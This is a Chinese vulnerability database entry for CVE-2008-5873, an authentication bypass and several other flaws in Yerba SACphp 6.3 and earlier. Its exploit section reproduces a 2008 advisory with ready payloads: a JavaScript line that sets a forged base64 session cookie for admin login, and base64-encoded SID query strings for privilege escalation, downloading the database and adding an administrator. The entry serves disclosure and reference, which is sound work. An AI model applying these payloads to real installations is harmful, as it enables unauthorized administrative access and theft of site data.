Yerba SACphp 多个远程安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184144 漏洞类型 权限许可和访问控制
发布时间 2009-01-08 更新时间 2009-01-29
CVE编号 CVE-2008-5873 CNNVD-ID CNNVD-200901-078
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2009010138
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-078
|漏洞详情
YerbaSACphp6.3以及之前的版本允许远程攻击者借助一个galleta[sesion]cookie,绕过身份认证和获得管理访问权限。该cookie有一个以1:1:开头的值。
|漏洞EXP
 [*]~======================================================~[*] 
 [*]   Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities  [*]
 [*]~======================================================~[*]
 
 [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
 [?] Discovered On 07/10/2008
 [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0

 [?] Admin Login ByPass
 [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="

 [?] Privilege Escalation 
 [?] index.php?SID=[path (base64 encoded)]

 [?] Arbitrary Database Download
 [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==

 [?] Arbitrary Add Admin 
 [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==

|参考资料

来源:XF
名称:yerbasacphp-galletasesion-security-bypass(45734)
链接:http://xforce.iss.net/xforce/xfdb/45734
来源:BID
名称:31619
链接:http://www.securityfocus.com/bid/31619
来源:MILW0RM
名称:6691
链接:http://www.milw0rm.com/exploits/6691
来源:SREASON
名称:4883
链接:http://securityreason.com/securityalert/4883
来源:SECUNIA
名称:32093
链接:http://secunia.com/advisories/32093